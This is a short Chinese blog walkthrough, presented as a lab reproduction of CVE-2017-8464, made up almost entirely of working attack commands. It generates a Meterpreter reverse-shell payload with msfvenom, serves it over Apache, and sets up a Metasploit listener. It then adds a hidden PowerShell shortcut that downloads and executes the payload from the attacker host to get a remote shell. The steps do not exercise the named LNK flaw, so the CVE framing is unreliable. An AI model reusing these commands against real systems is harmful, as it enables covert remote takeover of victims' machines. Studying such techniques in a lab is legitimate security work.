[漏洞复现]CVE-2017-8464

  1. 搭建Kali攻击机,ip地址为192.168.88.136。当Windows系统在解析powershell快捷方式时,存在远程执行任意代码的漏洞(CVE-2017-8464)。

  2. 生成攻击文件<search.ps1> msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.136 lport=5555 -f psh-reflection > /var/www/html/search.ps1

    [漏洞复现]CVE-2017-8464

  3. 开启Apache服务 service apache2 start

  4. 开启监听

    use exploit/multi/handler

    set payload windows/x64/meterpreter/reverse_tcp (和攻击文件使用的payload一样)

    set lhost 192.168.88.136

    set lport 5555

    run

    [漏洞复现]CVE-2017-8464

  5. 在win10靶机创建快捷方式 powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.88.136/search.ps1‘);test.ps1"。

    [漏洞复现]CVE-2017-8464

  6. 双击快捷键,成功返回到metasploit上一个session 输入shell,就可以控制靶机了

    [漏洞复现]CVE-2017-8464

上一篇:九、系统优化方法(基础优化)


下一篇:ViewResolver和JSTL